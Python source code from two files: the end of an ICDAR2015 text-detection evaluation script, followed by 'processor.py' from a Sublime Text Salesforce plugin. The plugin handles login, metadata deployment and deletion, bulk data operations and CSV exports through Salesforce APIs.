procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
if res['boxes'].shape[0] == 0:
fw_txt_dt = open(os.path.join(save_path, 'res_{}.txt'.format(res['image_id'].split('/')[-1].split('.')[0])),
'w')
fw_txt_dt.close()
pbar.update(1)
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
continue
x1, y1, x2, y2, x3, y3, x4, y4 = res['boxes'][:, 0], res['boxes'][:, 1], res['boxes'][:, 2], res['boxes'][:, 3],\
res['boxes'][:, 4], res['boxes'][:, 5], res['boxes'][:, 6], res['boxes'][:, 7]
x1, y1 = x1 * res['scales'][0], y1 * res['scales'][1]
x2, y2 = x2 * res['scales'][0], y2 * res['scales'][1]
x3, y3 = x3 * res['scales'][0], y3 * res['scales'][1]
x4, y4 = x4 * res['scales'][0], y4 * res['scales'][1]
boxes = np.transpose(np.stack([x1, y1, x2, y2, x3, y3, x4, y4]))
if show_box:
boxes = backward_convert(boxes, False)
nake_name = res['image_id'].split('/')[-1]
draw_path = os.path.join(save_path, nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(draw_img,
boxes=boxes,
labels=res['labels'],
scores=res['scores'],
method=1,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
fw_txt_dt = open(os.path.join(save_path, 'res_{}.txt'.format(res['image_id'].split('/')[-1].split('.')[0])), 'w')
for box in boxes:
line = '%d,%d,%d,%d,%d,%d,%d,%d\n' % (box[0], box[1], box[2], box[3],
box[4], box[5], box[6], box[7])
fw_txt_dt.write(line)
fw_txt_dt.close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def eval(num_imgs, test_dir, gpu_ids, show_box):
txt_name = '{}.txt'.format(cfgs.VERSION)
if not args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************' * 3)
print('Already tested imgs:', img_filter)
print('****************************' * 3)
fr.close()
test_imgname_list = [os.path.join(test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
' Note that, we only support img format of (.jpg, .png, and .tiff) '
if num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: num_imgs]
dcl = build_whole_network_dcl.DetectionNetwork(base_network_name=cfgs.NET_NAME,
is_training=False)
test_icdar2015(det_net=dcl, real_test_img_list=real_test_img_list, gpu_ids=gpu_ids, show_box=show_box, txt_name=txt_name)
if not show_box:
os.remove(txt_name)
def parse_args():
parser = argparse.ArgumentParser('evaluate the result with Pascal2007 strand')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/yangxue/dataset/ICDAR2015/ch4_test_images', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--eval_num', dest='eval_num',
help='the num of eval imgs',
default=np.inf, type=int)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--multi_scale', '-ms', default=False,
action='store_true')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print(20*"--")
print(args)
print(20*"--")
eval(args.eval_num,
test_dir=args.test_dir,
gpu_ids=args.gpus,
show_box=args.show_box)
|
processor.py | import sublime
import sublime_plugin
import os
import xml
import urllib
import json
import threading
import time
import pprint
import urllib.parse
import shutil
import datetime
import math
from xml.sax.saxutils import unescape
from . import requests, context, util
from .context import COMPONENT_METADATA_SETTINGS
from .salesforce import soap, message
from .salesforce.api.bulk import BulkJob
from .salesforce.api.bulk import BulkApi
from .salesforce.api.metadata import MetadataApi
from .salesforce.api.tooling import ToolingApi
from .salesforce.api.apex import ApexApi
from .salesforce.lib.panel import Printer
from .progress import ThreadProgress, ThreadsProgress
from .salesforce.lib import diff
def handle_populate_users(callback_command, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
if api.result or api.result["success"]:
records = api.result["records"]
users = {}
for record in records:
if not record["FirstName"]:
name = "%s => %s" % (record["LastName"], record["Username"])
else:
name = "%s => %s" % (
"%s %s" % (record["LastName"], record["FirstName"]),
record["Username"]
)
users[name] = record["Id"]
util.add_config_history("users", users, settings)
sublime.active_window().run_command(callback_command)
# If sobjects is exist in `/.config/users.json`, just return it
settings = context.get_settings()
user_cache = os.path.join(settings["workspace"], ".config", "users.json")
if os.path.isfile(user_cache): return json.loads(open(user_cache).read())
# If not exist, we need to use callback function
api = ToolingApi(settings)
query = "SELECT Id, FirstName, LastName, Username FROM User WHERE IsActive = true"
thread = threading.Thread(target=api.query_all, args=(query,))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, "Downloading Users List", "Succeed to download users list")
def populate_sobject_recordtypes():
"""
Get dict ([sobject, recordtype name] => recordtype id) in whole org
@return: {
username , "sobject_recordtypes": {
sobject + rtname: rtid
}
...
}
"""
# Get settings
settings = context.get_settings()
# If sobjects is exist in `/.config/recordtype.json`, just return it
recordtype_path = settings["workspace"] + "/.config/recordtype.json"
if os.path.isfile(recordtype_path):
recordtype = json.loads(open(recordtype_path).read())
return recordtype
# If sobjects is not exist in globals(), post request to pouplate it
api = ToolingApi(settings)
query = "SELECT Id, Name, SobjectType FROM RecordType"
thread = threading.Thread(target=api.query_all, args=(query,))
thread.start()
while thread.is_alive() or not api.result:
time.sleep(1)
# Exception Process
if not api.result["success"]:
Printer.get('error').write(message.SEPRATE.format(util.format_error_message(api.result)))
return
records = api.result["records"]
sobject_recordtypes = {}
for recordtype in records:
sobject_type = recordtype["SobjectType"]
recordtype_name = recordtype["Name"]
recordtype_id = recordtype["Id"]
sobject_recordtypes[sobject_type + ", " + recordtype_name] = recordtype_id
# Add Master of every sobject to List
sobjects_describe = util.populate_sobjects_describe()
for sobject_type in sobjects_describe:
sobject_describe = sobjects_describe[sobject_type]
if not sobject_describe["layoutable"]: continue
sobject_recordtypes[sobject_type + ", Master"] = "012000000000000AAA"
util.add_config_history("recordtype", sobject_recordtypes, settings)
return sobject_recordtypes
def handle_update_user_language(language, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
session = util.get_session_info(settings)
if not session:
return Printer.get('error').write("Login is required before this action")
patch_url = "/sobjects/User/%s" % session["user_id"]
thread = threading.Thread(target=api.patch,
args=(patch_url, {"LanguageLocaleKey": language},))
thread.start()
ThreadProgress(api, thread, "Updating User Language to " + language,
"User language is updated to " + language)
def handle_enable_development_mode(user_id, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
patch_url = "/sobjects/User/%s" % user_id
thread = threading.Thread(target=api.patch,
args=(patch_url, {"UserPreferencesApexPagesDeveloperMode": True},))
thread.start()
ThreadProgress(api, thread, "Enabling User Development Mode",
"Succeed to Enabling User Development Mode")
def handle_update_user_password(user_id, new_password, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.manage_password, args=(
user_id, {"NewPassword": new_password},
))
thread.start()
masked_password = new_password[:5] + "*" * len(new_password[3:])
ThreadProgress(api, thread, "Updating User Password to " + masked_password,
"Succeed to update user password to " + masked_password)
def handle_login_thread(callback_options={}, force=False, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if result and result["success"]:
if "callback_command" in callback_options:
callback_command = callback_options["callback_command"]
args = callback_options["args"] if "args" in callback_options else {}
sublime.active_window().run_command(callback_command, args)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.login, args=(force,))
thread.start()
handle_thread(thread, timeout)
default_project_name = settings["default_project_name"]
ThreadProgress(api, thread, "Login to %s" % default_project_name,
default_project_name + " Login Succeed")
def handle_view_code_coverage(component_name, component_id, body, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]:
return
if result["totalSize"] == 0:
Printer.get("log").write("There is no available code coverage")
return
# Populate the coverage info from server
uncovered_lines = result["records"][0]["Coverage"]["uncoveredLines"]
covered_lines = result["records"][0]["Coverage"]["coveredLines"]
covered_lines_count = len(covered_lines)
uncovered_lines_count = len(uncovered_lines)
total_lines_count = covered_lines_count + uncovered_lines_count
if total_lines_count == 0:
Printer.get("log").write("There is no available code coverage")
return
coverage_percent = covered_lines_count / total_lines_count * 100
# Append coverage statistic info
coverage_statistic = "%s Coverage: %.2f%%(%s/%s)" % (
component_name, coverage_percent,
covered_lines_count, total_lines_count
)
# If has coverage, just add coverage info to new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": coverage_statistic,
"input": body
})
# Calculate line coverage
split_lines = view.lines(sublime.Region(0, view.size()))
uncovered_region = []
for region in split_lines:
# The first four Lines are the coverage info
line = view.rowcol(region.begin() + 1)[0] + 1
if line in uncovered_lines:
uncovered_region.append(region)
# Append body with uncovered line
view.add_regions("uncovered_lines", uncovered_region, "invalid", "dot",
sublime.DRAW_SOLID_UNDERLINE | sublime.DRAW_EMPTY_AS_OVERWRITE)
settings = context.get_settings()
api = ToolingApi(settings)
query = "SELECT Coverage FROM ApexCodeCoverageAggregate " + \
"WHERE ApexClassOrTriggerId = '{0}'".format(component_id)
thread = threading.Thread(target=api.query, args=(query, True,))
thread.start()
ThreadProgress(api, thread, "View Code Coverage of " + component_name,
"View Code Coverage of " + component_name + " Succeed")
handle_thread(thread, timeout)
def handle_refresh_folder(types, ignore_package_xml=True, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# Not succeed
if not api.result or not api.result["success"]: return
# Get refresh result
result = api.result
# Populate extract_to directory
extract_to = settings["workspace"]
# Extract zip, True means not override package.xml
thread = threading.Thread(target=util.extract_encoded_zipfile,
args=(result["zipFile"], extract_to, ignore_package_xml,))
thread.start()
util.reload_file_attributes(result["fileProperties"], settings)
# Hide panel 0.5 seconds later
sublime.set_timeout_async(Printer.get("log").hide_panel, 500)
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.retrieve, args=({"types": types},))
thread.start()
handle_thread(thread, timeout)
message = "Refresh Folder"
ThreadProgress(api, thread, message, message + " Succeed")
def handle_reload_symbol_tables(timeout=120):
"""
Reload Symbol Tables to Local Cache
"""
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]: return
# Get the username of default project
username = settings["username"]
# Save symbolTable to component_metadata.sublime-settings
symbol_table_cache = sublime.load_settings("symbol_table.sublime-settings")
symboltable_dict = symbol_table_cache.get(username, {})
for record in result["records"]:
# Sometimes symbolTable is null, just skip
if not record["SymbolTable"]: continue
# Outer completions
outer = util.parse_symbol_table(record["SymbolTable"])
symboltable_dict[record["Name"].lower()] = {
"outer": outer,
"name": record["Name"]
}
# Inner completions
inners = {}
for inn in record["SymbolTable"]["innerClasses"]:
inner = util.parse_symbol_table(inn)
inners[inn["name"].lower()] = inner
symboltable_dict[record["Name"].lower()]["inners"] = inners
symbol_table_cache.set(settings["username"], symboltable_dict)
sublime.save_settings("symbol_table.sublime-settings")
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query_symbol_table, args=(30,))
thread.start()
wating_message = "Reloading Symbol Tables"
ThreadProgress(api, thread, wating_message, wating_message + " Succeed")
handle_thread(thread, timeout)
def handle_reload_sobjects_completions(timeout=120):
"""
Save sobject describe to local which is used in completions
"""
def handle_threads(apis, threads, timeout):
for thread in threads:
if thread.is_alive():
sublime.set_timeout(lambda: handle_threads(apis, threads, timeout), timeout)
return
# If succeed, get the all sobject describe result
results = []
for api in apis:
results.extend(api.result)
# Save all sobject describe result to sublime settings
s = sublime.load_settings("sobjects_completion.sublime-settings")
sobjects_completion = {"sobjects": {}}
all_parent_relationship_dict = {}
all_child_relationship_dict = {}
for sobject_describe in results:
# Initiate Sobject completions
if "name" not in sobject_describe:
continue
sobject_name = sobject_describe["name"]
# If sobject is excluded sobject, just continue
sobject_name = sobject_name.lower()
sobjects_completion["sobjects"][sobject_name] = {
"name": sobject_describe["name"],
"keyPrefix": sobject_describe["keyPrefix"],
"layoutable": sobject_describe["layoutable"],
"triggerable": sobject_describe["triggerable"]
}
# Combine Fields dict, Picklist Field dict and parent relationship dict
fields_dict = {}
picklist_field_dict = {}
parent_relationship_dict = {}
child_relationship_dict = {}
for f in sobject_describe["fields"]:
field_name = f["name"]
precision = f["precision"]
scale = f["scale"]
field_type = f["type"]
referenceTo = f["referenceTo"] if "referenceTo" in f else []
if f["calculatedFormula"]:
capitalize_field = field_type.capitalize()
field_desc_dict = {
"double": "Formula(%s, %s, %s)" % (capitalize_field, precision, scale),
"currency": "Formula(%s, %s, %s)" % (capitalize_field, precision, scale),
"date": "Formula(Date)",
"datetime": "Formula(Datetime)",
"boolean": "Formula(Boolean)",
"int": "Formula(Integer)",
"reference": ("Reference(%s)" % ",".join(referenceTo)) if referenceTo else "Reference",
"other": "Formula(%s, %s)" % (capitalize_field, f["length"])
}
else:
field_desc_dict = {
"double": "Double(%s, %s)" % (precision, scale),
"currency": "Currency(%s, %s)" % (precision, scale),
"date": "Date",
"datetime": "Datetime",
"boolean": "Boolean",
"reference": ("Reference(%s)" % ",".join(referenceTo)) if referenceTo else "Reference",
"int": "Integer",
"other": "%s(%s)" % (field_type.capitalize(), f["length"])
}
# External Or not
externalUniqueNotation = ""
if f["externalId"] or f["unique"]:
externalUniqueNotation = "[%s%s%s] " % (
"E" if f["externalId"] else "",
"U" if f["unique"] else "",
"R" if not f["nillable"] else ""
)
# If display_field_name_and_label setting is true,
# display both field name and field label
field_name_desc = "%s(%s)" % (field_name, f["label"]) \
if settings["display_field_name_and_label"] else field_name
# Display field type with specified format
field_type_desc = field_desc_dict[field_type] if field_type \
in field_desc_dict else field_desc_dict["other"]
fd = "%s%s\t%s" % (externalUniqueNotation, field_name_desc, field_type_desc)
fields_dict[fd] = field_name
# Picklist Dcit
if f["type"] == "picklist":
picklists = []
for picklistValue in f["picklistValues"]:
picklists.append({
"label": picklistValue["label"],
"value": picklistValue["value"]
})
picklist_field_dict[field_name] = picklists
# List all Reference Field Relationship Name as fields
# Some fields has two more references, we can't list the fields of it
if not len(f["referenceTo"]) == 1: continue
parentRelationshipName = f["relationshipName"]
if not parentRelationshipName: continue
parentSobject = f["referenceTo"][0]
if parentRelationshipName in all_parent_relationship_dict:
is_duplicate = False
for so in all_parent_relationship_dict[parentRelationshipName]:
if parentSobject == so:
is_duplicate = True
break
if not is_duplicate:
all_parent_relationship_dict[parentRelationshipName].append(parentSobject)
else:
all_parent_relationship_dict[parentRelationshipName] = [parentSobject]
# Add Parent Relationship Name
parent_relationship_dict[f["relationshipName"]] = parentSobject
# Child Relationship dict
for f in sobject_describe["childRelationships"]:
childRelationshipName = f["relationshipName"]
childSobject = f["childSObject"]
if not childRelationshipName: continue
# Add Parent Relationship Name as Field
child_relationship_dict[childRelationshipName] = childSobject
# Combine sobject fields dict and sobject child relationship dict
sobjects_completion["sobjects"][sobject_name]["fields"] = fields_dict
sobjects_completion["sobjects"][sobject_name]["picklist_fields"] = picklist_field_dict
sobjects_completion["sobjects"][sobject_name]["parentRelationships"] = parent_relationship_dict
sobjects_completion["sobjects"][sobject_name]["childRelationships"] = child_relationship_dict
# Populate Child Relationship and Parent Relationship
sobjects_completion["parentRelationships"] = all_parent_relationship_dict
# sobjects_completion["childRelationships"] = all_child_relationship_dict
# Every project has unique username
username = settings["username"]
s.set(username, sobjects_completion)
# Save settings
sublime.save_settings("sobjects_completion.sublime-settings")
# Reload cache for completions
from . import completions
sublime.set_timeout(lambda: completions.load_sobject_cache(
True, username
), 5)
def handle_thread(api, thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(api, thread, timeout), timeout)
return
# Exception Process
if not api.result or not api.result["success"]:
return
# Get describe result of all sObjects
sobjects_describe = api.result["sobjects"]
sobjects = list(sobjects_describe.keys())
mcc = settings["maximum_concurrent_connections"]
chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
threads = []
apis = []
for sobjects in chunked_sobjects:
sobjects = [
{"name": so, "tooling": sobjects_describe[so]["tooling"]}
for so in sobjects
]
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_sobjects, args=(sobjects,))
thread.start()
threads.append(thread)
apis.append(api)
ThreadsProgress(threads, "Download Cache of Sobjects", "Download Cache of Sobjects Succeed")
handle_threads(apis, threads, 10)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.get_sobjects, args=())
thread.start()
ThreadProgress(api, thread, "Global Describe", "Global Describe Succeed")
handle_thread(api, thread, timeout)
def handle_destructive_files(dirs_or_files, ignore_folder=True, timeout=120):
"""
Destruct File(s) from Salesforce org and remove from local disk via Metadata API
@param dirs_or_files: lightning direcotry(bundle) or files
@param ignore_folder: ignore the folder itself
@param timeout: timeout in second
@return: None
"""
def handle_destruct_thread(thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda: handle_destruct_thread(thread, timeout), timeout)
return
# After succeed, remove dirs_or_files and related *-meta.xml from local
if "body" in api.result and api.result["body"]["status"] == "Succeeded":
# Remove Component metadata cache
util.delete_component_attribute(dirs_or_files)
# Remove file from local disk and close the related view
win = sublime.active_window()
for _file_or_dir in dirs_or_files:
view = util.get_view_by_file_name(_file_or_dir)
if view:
win.focus_view(view)
win.run_command("close")
if os.path.isfile(_file_or_dir):
os.remove(_file_or_dir)
else:
shutil.rmtree(_file_or_dir)
# Remove related *-meta.xml file from local disk and close the related view
if ignore_folder and os.path.isfile(_file_or_dir + "-meta.xml"):
view = util.get_view_by_file_name(_file_or_dir + "-meta.xml")
if view:
win.focus_view(view)
win.run_command("close")
os.remove(_file_or_dir + "-meta.xml")
settings = context.get_settings()
api = MetadataApi(settings)
base64_encoded_zip = util.build_destructive_package_by_files(dirs_or_files, ignore_folder)
thread = threading.Thread(target=api.deploy, args=(base64_encoded_zip,))
thread.start()
ThreadProgress(api, thread, "Destructing Files", "Destructing Files Succeed")
handle_destruct_thread(thread, timeout)
def handle_destructive_package_xml(types, timeout=120):
def handle_thread(thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
settings = context.get_settings()
api = MetadataApi(settings)
base64_encoded_zip = util.build_destructive_package_by_package_xml(types)
thread = threading.Thread(target=api.deploy, args=(base64_encoded_zip,))
thread.start()
ThreadProgress(api, thread, "Destructing Package.xml", "Destructing Package.xml Succeed")
handle_thread(thread, timeout)
def handle_deploy_thread(base64_encoded_zip, source_org=None, element=None,
chosen_classes=[], timeout=120, update_meta=False):
"""
Deploy code to specified Salesforce org via Metadata API
@param base64_encoded_zip: code content in base64 encoded
@param source_org: destination Salesforce org
@param element: aura element in [Application, Component, Event, Controller, Helper,etc.]
@param chosen_classes:
@param timeout: timeout in second
@param update_meta: whether update component metadata after deployed
@return: None
"""
def handle_thread(thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If source_org is not None, we need to switch project back
if settings["switch_back_after_migration"] and source_org:
util.switch_project(source_org)
result = api.result
body = result["body"]
if body["status"] == "Succeeded" and update_meta:
handle_update_lightning_meta(body, element)
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.deploy, args=(
base64_encoded_zip,
chosen_classes,
))
thread.start()
ThreadProgress(api, thread, "Deploy Metadata to %s" % settings["default_project_name"],
"Metadata Deployment Finished")
handle_thread(thread, timeout)
def handle_update_lightning_meta(body, element, timeout=120):
"""
Update lightning aura/web component metadata via Tooling API after creation
:param body: body data returned from SOAP API
:param element: Aura bundle type in `COMPONENT`, `CONTROLLER`, `HELPER`, `SVG`...
:param timeout: timeout in second
:param cmp_type: type
:return:
"""
def handle_thread(thread, full_name, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, full_name, timeout), timeout)
return
result = api.result
if not result or not result["success"]:
return
if result["totalSize"] == 0:
Printer.get("log").write("There is no component data")
return
elif result["totalSize"] == 1 and bundle_type == "AuraDefinitionBundle":
# save single aura definition file
record = result["records"][0]
cmp_meta = {
"name": full_name[:full_name.find('.')],
"extension": full_name[full_name.find('.'):],
"id": record["Id"],
"lastModifiedDate": record["LastModifiedDate"],
"type": bundle_type,
"DefType": record["DefType"]
}
components_dict[bundle_type][full_name.lower()] = cmp_meta
elif bundle_type == "LightningComponentBundle":
# save multiple Lightning Component Resource files
for record in result["records"]:
_lwc, bundle_name, full_name = record["FilePath"].split("/") # lwc/t2/t2.js-meta.xml
cmp_meta = {
"name": full_name[:full_name.find('.')], # t2.js-meta
"extension": full_name[full_name.find('.'):], # .xml
"id": record["Id"],
"lastModifiedDate": record["LastModifiedDate"],
"type": bundle_type
}
components_dict[bundle_type][full_name.lower()] = cmp_meta
# Save and reload component metadata
if result["totalSize"] >= 1:
s.set(username, components_dict)
sublime.save_settings(context.COMPONENT_METADATA_SETTINGS)
# Refresh metadata settings
sublime.set_timeout(lambda: util.load_metadata_cache(True, settings["username"]), 5)
settings = context.get_settings()
username = settings["username"]
s = sublime.load_settings(context.COMPONENT_METADATA_SETTINGS)
if not s.has(username):
return
component_successes = body["details"]["componentSuccesses"]
if isinstance(component_successes, dict):
component_successes = [component_successes]
for item in component_successes:
bundle_type = item["componentType"]
if bundle_type in ["AuraDefinitionBundle", "LightningComponentBundle"]:
base_name = item["fullName"]
full_name = (base_name + context.EXT_DICT.get(element.lower())) \
if element is not None and bundle_type == "AuraDefinitionBundle" else ""
components_dict = s.get(username, {})
# Prevent exception if no component in org
if bundle_type not in components_dict:
components_dict = {bundle_type: {}}
# Build components dict
api = ToolingApi(settings)
query_str = "SELECT Id, Format, LastModifiedDate, LastModifiedById "
if bundle_type == 'AuraDefinitionBundle':
query_str += ", DefType FROM AuraDefinition WHERE AuraDefinitionBundleId = '%s' and DefType = '%s'"\
% (item['id'], element.upper())
elif bundle_type == 'LightningComponentBundle':
query_str += ", FilePath FROM LightningComponentResource WHERE LightningComponentBundleId = '%s'"\
% (item['id'])
thread = threading.Thread(target=api.query, args=(query_str, True))
thread.start()
ThreadProgress(api, thread, "Update Component Metadata", "Update Component Metadata Finished")
handle_thread(thread, full_name, timeout)
break
def handle_track_all_debug_logs_thread(users, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
# Divide users into pieces of dict
pieces = []
maximum_concurrent_connections = settings["maximum_concurrent_connections"]
split = math.ceil(len(users) / maximum_concurrent_connections)
for item in util.dict_chunks(users, split):
pieces.append(item)
threads = []
for users in pieces:
api = ToolingApi(settings)
thread = threading.Thread(target=api.create_trace_flags, args=(users,))
thread.start()
threads.append(thread)
ThreadsProgress(threads, "Creating Trace Flags", "Creating Trace Flags Finished")
def handle_cancel_deployment_thread(async_process_id, timeout=120):
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api._invoke_method, args=(
"cancelDeploy", {
"async_process_id": async_process_id,
}
))
thread.start()
ThreadProgress(api, thread, "Canceling Deploy", "Canceling Deploy Succeed")
def handle_close_jobs_thread(job_ids, timeout=120):
settings = context.get_settings()
bulkjob = BulkJob(settings, None, None)
for job_id in job_ids:
thread = threading.Thread(target=bulkjob.close_job, args=(job_id,))
thread.start()
def handle_bulk_operation_thread(sobject, inputfile, operation, timeout=120):
settings = context.get_settings()
bulkapi = BulkApi(settings, sobject, inputfile)
if operation == "insert":
target = bulkapi.insert
elif operation == "update":
target = bulkapi.update
elif operation == "upsert":
target = bulkapi.upsert
elif operation == "delete":
target = bulkapi.delete
thread = threading.Thread(target=target, args=())
thread.start()
progress_message = operation + " " + sobject
ThreadProgress(bulkapi, thread, progress_message, progress_message + " Succeed")
def handle_backup_sobject_thread(sobject, soql=None, timeout=120):
settings = context.get_settings()
bulkapi = BulkApi(settings, sobject, soql)
thread = threading.Thread(target=bulkapi.query, args=())
thread.start()
wait_message = "Export Records of " + sobject
ThreadProgress(bulkapi, thread, wait_message, wait_message + " Succeed")
def handle_backup_all_sobjects_thread(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result or not result["success"]: return
threads = []
for sobject_describe in api.result["sobjects"]:
if "name" not in sobject_describe: continue
bulkapi = BulkApi(settings, sobject_describe["name"])
thread = threading.Thread(target=bulkapi.query, args=())
thread.start()
threads.append(thread)
wait_message = "Export All Sobjects Records"
ThreadsProgress(threads, wait_message, wait_message + " Succeed")
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Describe Global", "Describe Global Succeed")
handle_thread(thread, timeout)
def handle_export_workflows(settings, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
sObjects = []
for sd in api.result["sobjects"]:
if "name" not in sd: continue
sObjects.append(sd["name"])
util.parse_workflow_metadata(settings, sObjects)
sublime.active_window().run_command("refresh_folder_list")
outputdir = settings["workspace"] + "/workflow/"
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Export All Workflows", "Outputdir: " + outputdir)
handle_thread(thread, 10)
def handle_export_validation_rules(settings, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
sObjects = []
for sd in api.result["sobjects"]:
if "name" not in sd: continue
sObjects.append(sd["name"])
util.parse_validation_rule(settings, sObjects)
sublime.active_window().run_command("refresh_folder_list")
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Export All Validation Rules", "Validation Rules Export Succeed")
handle_thread(thread, 10)
def handle_export_customfield(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result or not result["success"]: return
# Write list to csv
outputdir = os.path.join(settings["workspace"], ".export")
if not os.path.exists(outputdir): os.makedirs(outputdir)
records = sorted(result["records"], key=lambda k: k['TableEnumOrId'])
outputfile = os.path.join(outputdir, "CustomField.csv")
util.list2csv(outputfile, records)
# Open the csv file
view = sublime.active_window().open_file(outputfile)
settings = context.get_settings()
api = ToolingApi(settings)
query = "SELECT Id,TableEnumOrId,DeveloperName,NamespacePrefix FROM CustomField"
thread = threading.Thread(target=api.query, args=(query, True,))
thread.start()
ThreadProgress(api, thread, 'Exporting CustomFields', "Exporting CustomFields Succeed")
handle_thread(thread, 10)
def handle_export_role_hierarchy(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result or not result["success"]: return
records = result["records"]
outputfile = util.export_role_hierarchy(records)
sublime.active_window().run_command("refresh_folder_list")
# Open file
view = sublime.active_window().open_file(outputfile)
settings = context.get_settings()
api = ToolingApi(settings)
soql = "SELECT Id, ParentRoleId, Name, " + \
"(SELECT Id, FirstName, LastName, Username FROM Users " + \
" WHERE IsActive = true AND Profile.UserLicense.Name = 'Salesforce') " + \
"FROM UserRole WHERE PortalType = 'None'"
thread = threading.Thread(target=api.query_all, args=(soql,))
thread.start()
ThreadProgress(api, thread, 'Exporting Role Hierarchy', "Role Hierarchy Exporting Succeed")
handle_thread(thread, 10)
def handle_export_data_template_thread(sobject, recordtype_name, recordtype_id, vertical, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result or not result["success"]: return
# If outputdir is not exist, just make it
if not os.path.exists(outputdir): os.makedirs(outputdir)
# Write parsed result to csv
if vertical:
util.parse_data_template_vertical(output_file_dir, result)
else:
util.parse_data_template_horizontal(output_file_dir, result)
sublime.active_window().run_command("refresh_folder_list")
Printer.get("log").write("Data Template for %s: %s" % (sobject, output_file_dir))
settings = context.get_settings()
outputdir = settings["workspace"] + "/.export/layoutWorkbooks"
output_file_dir = "%s/%s-%s.csv" % (
outputdir, sobject, recordtype_name
)
api = ToolingApi(settings)
url = "/sobjects/%s/describe/layouts/%s" % (sobject, recordtype_id)
thread = threading.Thread(target=api.get, args=(url,))
thread.start()
wait_message = "Export Data Template of %s=>%s" % (sobject, recordtype_name)
ThreadProgress(api, thread, wait_message, "Outputdir: " + output_file_dir)
handle_thread(thread, 120)
def handle_export_query_to_csv(tooling, soql, csv_name, data=None, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
result = api.result
if "success" in result and not result["success"]:
return
outputdir = os.path.join(settings["workspace"], ".export", "Query2CSV")
if not os.path.exists(outputdir): os.makedirs(outputdir)
time_stamp = time.strftime("%Y-%m-%d-%H-%M", time.localtime())
outputfile = os.path.join(outputdir, "%s.csv" % csv_name)
